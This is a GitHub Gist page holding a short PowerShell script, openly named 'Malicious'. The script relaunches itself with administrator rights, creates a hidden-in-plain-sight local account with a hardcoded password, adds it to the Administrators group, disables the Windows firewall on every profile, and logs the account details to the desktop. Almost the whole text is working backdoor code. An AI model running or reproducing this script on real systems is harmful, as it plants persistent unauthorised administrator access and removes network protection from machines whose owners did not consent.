Last active
August 12, 2019 12:36
-
-
Save PrateekKumarSingh/40e8eead75d41940406e1cd01b6e4fa3 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Malicious { | |
#Get current user context | |
$CurrentUser = New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent()) | |
#Check user is running the script is member of Administrator Group | |
if($CurrentUser.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)) | |
{ | |
Write-host "Script is running with Administrator privileges!" | |
} | |
else | |
{ | |
#Create a new Elevated process to Start PowerShell | |
$ElevatedProcess = New-Object System.Diagnostics.ProcessStartInfo "PowerShell"; | |
# Specify the current script path and name as a parameter | |
$ElevatedProcess.Arguments = "& '" + $script:MyInvocation.MyCommand.Path + "'" | |
#Set the Process to elevated | |
$ElevatedProcess.Verb = "runas" | |
#Start the new elevated process | |
[System.Diagnostics.Process]::Start($ElevatedProcess) | |
#Exit from the current, unelevated, process | |
Exit | |
} | |
$Username = "malcioususer" | |
$Password = "Continuum@2019" | |
$group = "Administrators" | |
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME" | |
$existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username } | |
if ($existing -eq $null) { | |
Write-Host "Creating new local user $Username." | |
& NET USER $Username $Password /add /y /expires:never | |
Write-Host "Adding local user $Username to $group." | |
& NET LOCALGROUP $group $Username /add | |
} | |
else { | |
Write-Host "Setting password for existing local user $Username." | |
$existing.SetPassword($Password) | |
} | |
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False | |
$existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username} | |
if($existing){ | |
$existing | Out-File $env:USERPROFILE\Desktop\priv2.log -Verbose | |
} | |
} | |
malicious |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment